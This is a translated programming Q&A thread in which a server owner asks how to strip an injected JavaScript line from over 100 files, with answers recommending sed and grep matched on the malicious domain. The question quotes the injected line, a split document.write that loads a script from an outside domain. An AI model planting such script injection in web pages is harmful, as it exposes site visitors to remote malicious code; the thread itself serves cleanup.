Как удалить вредоносный код Javascript из нескольких файлов

Недавно мой Linux-сервер был заражен вредоносным ПО, и в результате у меня есть более 100 файлов, зараженных одной строкой кода Javascript:

document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Kilobyte.js"></scri'+'pt>');

Убирать вручную было бы слишком утомительно, поэтому копаюсь в гугле (мало знаний о линуксе там не помогло) и выяснил, что для этой цели можно использовать sed.

К сожалению, я не мог избежать линии, поэтому я мог использовать

sed -i.bak '/line of text/d' *

синтаксис, он полон одинарных кавычек, двойных кавычек и обратной косой черты.

Как я могу избежать строки или есть ли другой, более простой способ сделать это?


escaping sed malware
person Ugur Sahin    schedule 31.10.2010    source источник
comment
Кстати, это косая черта, а не обратная косая черта, и вы можете использовать альтернативные разделители в sed, поэтому вам не нужно делать столько экранирования. sed '\|text/with/slashes|d'. К сожалению, цитаты - другое дело.   -  person Dennis Williamson    schedule 31.10.2010

Ответы (2)


arrow_upward
1
arrow_downward

Не могли бы вы просто использовать sed для удаления любой строки, содержащей, например, alienradar.ru или какую-либо другую подстроку, которая существует только в оскорбительных строках? Что-то типа:

sed -i.bak '/alienradar.ru/d' *
person High Performance Mark    schedule 31.10.2010
comment
Могу ли я также получить список затронутых файлов? - person Ugur Sahin; 31.10.2010
comment
@Ugur Sahin: вы можете получить список затронутых файлов с помощью «grep -c linearradar *», где флаг -c указывает grep подсчитывать количество совпадающих строк в каждом файле, а не печатать каждую совпадающую строку. - person High Performance Mark; 31.10.2010

arrow_upward
0
arrow_downward

http://www.configureweb.com/post/how-to-change-html-code-in-multiple-files-at-once выполните это после загрузки всех файлов с сервера и повторной загрузки.

person DJP    schedule 15.11.2012